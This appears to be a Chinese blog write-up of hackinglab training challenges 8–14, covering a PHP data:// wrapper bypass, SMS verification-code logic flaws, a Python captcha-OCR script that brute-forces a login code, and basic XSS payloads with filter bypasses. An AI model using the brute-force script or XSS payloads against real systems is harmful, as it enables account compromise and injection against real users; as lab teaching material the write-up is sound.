hackinglab脚本关WP(二)

8.微笑一下就能过关了
查看源代码,看到

<a href="?view-source">源代码

直接点不开,于是在url后面加上,即可得到
这里写图片描述
不知道怎么写。后来在发现这是ISG2014的一道题目的衍生,那题的WP:http://www.secpulse.com/archives/1112.html

看php源码的时候看到提交笑脸就可以了

 if ($smile === "(●'◡'●)") die($flag); 

不过实际测试的时候发现提交笑脸无效,所以我们用urlencode笑脸,这样浏览器就帮我们自动解析了,笑脸的urlencode就是%28%E2%97%8F%27%E2%97%A1%27%E2%97%8F%29

data://text/plain表示数据是无格式正文,源代码指定用charset:utf-8,不过测试的时候发现这样不行,由于utf-8从属于unicode,所以我们用charset:unicode

最后构造出如下url,即可

http://lab1.xseclab.com/base13_ead1b12e47ec7cc5390303831b779d47/?^.^=data://text/plain;charset=unicode,%28%E2%97%8F%27%E2%97%A1%27%E2%97%8F%29

9.逗比的手机验证码
最开始直接输入验证码提示手机手机号错误,应该是….7,在登陆界面改了手机号重新输入之后,又提示验证码发到别人手机上了

所以我们先用….6的手机号接收验证码,得到验证码后再将手机号改为…7,登陆得到key

10.基情燃烧的岁月
burp爆破验证码,得到
这里写图片描述
在网页中输入
这里写图片描述
于是把手机号换了,再爆破一次

11.验证码识别

用python的时候注意需要安装PIL,pytesser等,详细的python进行验证码识别的过程可以看我另外一篇博文
这里附上python3写的

import pytesseract
from PIL import Image
import requests
import os
cur_path = os.getcwd()
vcode_path = os.path.join(cur_path, 'vcode.png')
header = {'Cookie': 'PHPSESSID=$Your Value'}

def vcode():
    # 验证码识别函数
    pic_url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/vcode.php'
    r = requests.get(pic_url, headers=header, timeout=10)
    with open(vcode_path, 'wb') as pic:
        pic.write(r.content)
    im = pytesseract.image_to_string(Image.open(vcode_path))
    im = im.replace(' ', '')
    if im != '':
        return im
    else:
        return vcode()

url = 'http://lab1.xseclab.com/vcode7_f7947d56f22133dbc85dda4f28530268/login.php'
for i in range(100, 1000):
    code = vcode()
    data = {'username': '13388886666', 'mobi_code': str(i), 'user_code': code}
    r = requests.post(url, data=data, headers=header, timeout=10)
    response = r.content.decode('utf-8')
    if 'user_code or mobi_code error' in response:
        print('trying ' + str(i))
    else:
        print('the mobi_code is ' + str(i))
        print(response)
        break

12.XSS基础关
查看源码,发现
这里写图片描述
please use alert(Hackinglab)
所以我们构造语句

<script>alert(HackingLab)</script>

填入框中就行了

13.XSS基础2:简单绕过
看起来好像和上一次差不多,用上一次的方法做的时候发现被检测到了
这里写图片描述
构造个别的类似的语句试试

<img src=# onerror=alert(HackingLab) />

14.XSS基础3:检测与构造
和前两题还是差不多,还是不能用同样的语句,代码里也看不出什么地方不同,碰运气慢慢构造吧

alert' onmouseover=alert(HackingLab)>
  • 1
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值